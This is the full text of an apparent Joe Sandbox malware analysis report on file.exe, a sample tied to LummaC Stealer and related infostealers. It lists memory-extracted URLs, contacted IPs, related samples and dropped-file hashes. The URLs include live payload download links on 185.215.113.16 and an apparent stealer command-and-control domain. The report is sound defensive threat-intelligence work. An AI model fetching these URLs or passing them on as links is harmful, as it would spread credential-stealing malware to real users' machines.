                                                                                            https://aka.ms/certhelpchromecache_92.12.dr, chromecache_104.12.drfalse
                                                                                              high
                                                                                              http://185.215.113.16/steam/random.exefile.exe, 00000003.00000003.1640851103.0000000000580000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1651067283.0000000000582000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1729267093.0000000000581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696490019400400000.2&ci=1696490019252.file.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=file.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://github.com/mairawchromecache_112.12.drfalse
                                                                                                        high
                                                                                                        http://www.microsoft.file.exe, 00000003.00000003.1551682514.000000000058C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://ocsp.rootca1.amazontrust.com0:file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://schema.orgchromecache_104.12.drfalse
                                                                                                              high
                                                                                                              http://polymer.github.io/LICENSE.txtchromecache_92.12.dr, chromecache_104.12.drfalse
                                                                                                                high
                                                                                                                https://www.ecosia.org/newtab/file.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  https://property-imper.sbs/file.exe, file.exe, 00000003.00000003.1641038627.0000000000536000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1551682514.00000000005A8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1551682514.000000000058C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1651067283.000000000053F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brfile.exe, 00000003.00000003.1405435691.0000000005422000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://aka.ms/yourcaliforniaprivacychoiceschromecache_112.12.drfalse
                                                                                                                        high
                                                                                                                        https://ac.ecosia.org/autocomplete?q=file.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          https://github.com/nschonnichromecache_112.12.drfalse
                                                                                                                            high
                                                                                                                            http://185.215.113.16/file.exe, 00000003.00000003.1640714280.00000000005AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://videoencodingpublic-hgeaeyeba8gycee3.b01.azurefd.net/public-09ce73a6-05a5-4e4d-b3d7-bd5a8c05chromecache_92.12.dr, chromecache_104.12.drfalse
                                                                                                                                high
                                                                                                                                https://github.com/adegeochromecache_112.12.drfalse
                                                                                                                                  high
                                                                                                                                  http://185.215.113.16/Dfile.exe, 00000003.00000003.1640714280.00000000005AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgfile.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://github.com/jonschlinkert/is-plain-objectchromecache_92.12.dr, chromecache_104.12.drfalse
                                                                                                                                      high
                                                                                                                                      http://crt.rootca1.amazontrust.com/rootca1.cer0?file.exe, 00000003.00000003.1404322927.0000000005334000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://octokit.github.io/rest.js/#throttlingchromecache_92.12.dr, chromecache_104.12.drfalse
                                                                                                                                          high
                                                                                                                                          https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&ufile.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pqWfpl%2B4pbW4pbWfpbW7ReNxR3UIG8zInwYIFIVs9efile.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://contile-images.services.mozilla.com/CuERQnIs4CzqjKBh9os6_h9d4CUDCHO3oiqmAQO6VLM.25122.jpgfile.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://github.com/js-cookie/js-cookiechromecache_92.12.dr, chromecache_104.12.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://property-imper.sbs:443/apigfile.exe, 00000003.00000003.1640714280.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1429934076.00000000005C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1464672003.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1430189557.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1651046664.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1484947321.00000000005C3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1466756787.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1430094295.00000000005CD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1485058236.00000000005C6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://185.215.113.16/off/def.exefile.exe, 00000003.00000003.1640851103.0000000000580000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000003.1651067283.0000000000582000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.1729267093.0000000000581000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    http://schema.org/Organizationchromecache_112.12.drfalse
                                                                                                                                                      high
                                                                                                                                                      https://channel9.msdn.com/chromecache_92.12.dr, chromecache_104.12.drfalse
                                                                                                                                                        high
                                                                                                                                                        https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=file.exe, 00000003.00000003.1353449588.000000000534E000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353605646.000000000534C000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000003.00000003.1353514276.000000000534C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://github.com/dotnet/trychromecache_92.12.dr, chromecache_104.12.drfalse
                                                                                                                                                            high
                                                                                                                                                            https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696490019400400000.1&ci=1696490019252.12791&ctafile.exe, 00000003.00000003.1429856352.0000000005308000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs
                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              13.107.246.63
                                                                                                                                                              s-part-0035.t-0009.t-msedge.netUnited States
                                                                                                                                                              8068MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                              185.215.113.16
                                                                                                                                                              unknownPortugal
                                                                                                                                                              206894WHOLESALECONNECTIONSNLfalse
                                                                                                                                                              239.255.255.250
                                                                                                                                                              unknownReserved
                                                                                                                                                              unknownunknownfalse
                                                                                                                                                              104.21.33.116
                                                                                                                                                              property-imper.sbsUnited States
                                                                                                                                                              13335CLOUDFLARENETUSfalse
                                                                                                                                                              172.217.21.36
                                                                                                                                                              www.google.comUnited States
                                                                                                                                                              15169GOOGLEUSfalse
                                                                                                                                                              IP
                                                                                                                                                              192.168.2.7
                                                                                                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                              Analysis ID:1561566
                                                                                                                                                              Start date and time:2024-11-23 19:51:12 +01:00
                                                                                                                                                              Joe Sandbox product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 6m 55s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:full
                                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                              Number of analysed new started processes analysed:18
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:0
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Sample name:file.exe
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.spyw.evad.winEXE@24/64@9/6
                                                                                                                                                              EGA Information:Failed
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 100%
                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                              • Number of non-executed functions: 16
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                                                                                              • Excluded IPs from analysis (whitelisted): 84.201.208.71, 172.217.19.227, 64.233.165.84, 172.217.17.46, 2.18.110.57, 2.20.41.214, 34.104.35.123, 20.189.173.24, 142.250.181.106, 142.250.181.74, 172.217.19.202, 172.217.17.42, 142.250.181.138, 142.250.181.42, 142.250.181.10, 172.217.17.74, 172.217.19.234, 2.20.68.201, 2.20.68.216, 178.79.238.128, 13.74.129.1, 204.79.197.237, 13.107.21.237, 172.217.17.35
                                                                                                                                                              • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, clientservices.googleapis.com, browser.events.data.trafficmanager.net, learn.microsoft.com, time.windows.com, e11290.dspg.akamaiedge.net, mdec.nelreports.net.akamaized.net, clients2.google.com, go.microsoft.com, star-azurefd-prod.trafficmanager.net, a1883.dscd.akamai.net, learn.microsoft.com.edgekey.net, update.googleapis.com, fs.microsoft.com, accounts.google.com, content-autofill.googleapis.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, ctldl.windowsupdate.com, learn.microsoft.com.edgekey.net.globalredir.akadns.net, firstparty-azurefd-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, browser.events.data.microsoft.com, edgedl.me.gvt1.com, e13636.dscb.akamaiedge.net, c.bing.com, learn-public.trafficmanager.net, go.microsoft.com.edgekey.net, dual-a-0034.a-msedge.net, onedscolprdwus23.westus.cloudapp.azure.com, clients.l.google.com, c1.microsoft.com, wcpstatic.microsoft.com
                                                                                                                                                              • Execution Graph export aborted for target file.exe, PID 6908 because there are no executed function
                                                                                                                                                              • HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
                                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                              • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                              • VT rate limit hit for: file.exe
                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              13:52:16API Interceptor78x Sleep call for process: file.exe modified
                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                              13.107.246.63http://elizgallery.com/js.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                        file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                          file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                            file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                              file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  185.215.113.16file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16/off/def.exe
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 185.215.113.16/off/def.exe
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 185.215.113.16/mine/random.exe
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16/off/def.exe
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16/off/def.exe
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16/off/def.exe
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                  • 185.215.113.16/mine/random.exe
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16/off/def.exe
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Clipboard Hijacker, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 185.215.113.16/off/random.exe
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 185.215.113.16/off/def.exe
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  property-imper.sbsfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  S#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  s-part-0035.t-0009.t-msedge.nethttp://elizgallery.com/js.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  17323828261cfef277a3375a886445bf7f5a834ebb1cc85e533e9ac93595cd0e56ebd12426132.dat-decoded.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  21Installer.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  CLOUDFLARENETUScmd.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                                                  • 162.159.128.233
                                                                                                                                                                                  http://elizgallery.com/js.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.64.41.3
                                                                                                                                                                                  https://elizgallery.com/nazvanie.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 104.22.0.204
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  https://myqrcode.mobi/qr/3c3aa5e1/viewGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 172.67.20.8
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 172.67.162.84
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                  • 172.67.223.140
                                                                                                                                                                                  MICROSOFT-CORP-MSN-AS-BLOCKUShttp://elizgallery.com/js.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 204.79.197.203
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 104.214.22.71
                                                                                                                                                                                  sora.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 104.147.102.52
                                                                                                                                                                                  sora.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 20.74.225.207
                                                                                                                                                                                  sora.mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 13.105.41.140
                                                                                                                                                                                  sora.spc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                  • 20.190.241.21
                                                                                                                                                                                  WHOLESALECONNECTIONSNLfile.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16
                                                                                                                                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 185.215.113.16
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16
                                                                                                                                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 185.215.113.16
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  file.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                  • 185.215.113.206
                                                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                  28a2c9bd18a11de089ef85a160da29e4file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 4.175.87.197
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 2.18.109.164
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 4.175.87.197
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 2.18.109.164
                                                                                                                                                                                  https://myqrcode.mobi/qr/3c3aa5e1/viewGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 4.175.87.197
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 2.18.109.164
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                  • 4.175.87.197
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 2.18.109.164
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 4.175.87.197
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 2.18.109.164
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 4.175.87.197
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 2.18.109.164
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 4.175.87.197
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 2.18.109.164
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                  • 4.175.87.197
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 2.18.109.164
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 4.175.87.197
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 2.18.109.164
                                                                                                                                                                                  Q460725_8952397_6525_PDF.htmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                  • 4.175.87.197
                                                                                                                                                                                  • 13.107.246.63
                                                                                                                                                                                  • 2.18.109.164
                                                                                                                                                                                  a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  file.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  file.exeGet hashmaliciousAmadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  Aquantia_Installer.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  Call 0f Duty A1 Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  Launcher.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  S#U043eftWare.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                  • 104.21.33.116
                                                                                                                                                                                  No context
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                  Size (bytes):4897
                                                                                                                                                                                  Entropy (8bit):4.8007377074457604
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:A0AIvEQ+KfZcbhaW9dp45qtAdflfDOFnymoLByzfwqrLvJ4QG63JkRJ+dRp8TJHr:dgQ+KfZcbhaWjp45qtAdflfDOFnNgByQ
                                                                                                                                                                                  MD5:0E78F790402498FA57E649052DA01218
                                                                                                                                                                                  SHA1:9ED4D0846DA5D66D44EE831920B141BBF60A0200
                                                                                                                                                                                  SHA-256:73F3061A46EA8FD11D674FB21FEEEFE3753FC3A3ED77224E7F66A964C0420603
                                                                                                                                                                                  SHA-512:B46E4B90E53C7DABC7208A6FDAE53F25BD70FCFBBEF03FFC64B1B5D1EB1C01C870A7309DF167246FCCD114B483038A64D7C46CA3B9FCB3779A77E42DB6967051
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                                  URL:https://learn.microsoft.com/en-us/content-nav/MSDocsHeader-DotNet.json?
                                                                                                                                                                                  Preview:{"callToAction":{"primary":{"biName":"download-dotnet","href":"https://dotnet.microsoft.com/download","kind":"link","title":"Download .NET"}},"category":{"biName":"dotnet","href":"/dotnet/","kind":"link","title":".NET"},"items":[{"biName":"1-languages","items":[{"biName":"1-c-sharp","href":"/dotnet/csharp/","kind":"link","title":"C#"},{"biName":"2-f-sharp","href":"/dotnet/fsharp/","kind":"link","title":"F#"},{"biName":"3-visual-basic","href":"/dotnet/visual-basic/","kind":"link","title":"Visual Basic"}],"kind":"menu","title":"Languages"},{"biName":"2-features","items":[{"biName":"1-fundamental","href":"/dotnet/fundamentals/","kind":"link","title":"Fundamentals"},{"biName":"2-tools-and-diagnostics","href":"/dotnet/navigate/tools-diagnostics/","kind":"link","title":"Tools and diagnostics"},{"biName":"3-ai","items":[{"biName":"1-generative-ai","href":"/dotnet/ai/","kind":"link","title":"Generative AI"},{"biName":"2-mlnet","href":"/dotnet/machine-learning/","kind":"link","title":"ML.NET"}]
                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):72
                                                                                                                                                                                  Entropy (8bit):4.241202481433726
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:YozDD/RNgQJzRWWlKFiFD3e4xCzY:YovtNgmzR/wYFDxkY
                                                                                                                                                                                  MD5:9E576E34B18E986347909C29AE6A82C6
                                                                                                                                                                                  SHA1:532C767978DC2B55854B3CA2D2DF5B4DB221C934
                                                                                                                                                                                  SHA-256:88BDF5AF090328963973990DE427779F9C4DF3B8E1F5BADC3D972BAC3087006D
                                                                                                                                                                                  SHA-512:5EF6DCFFD93434D45760888BF4B95FF134D53F34DA9DC904AD3C5EBEDC58409073483F531FEA4233869ED3EC75F38B022A70B2E179A5D3A13BDB10AB5C46B124
                                                                                                                                                                                  Malicious:false
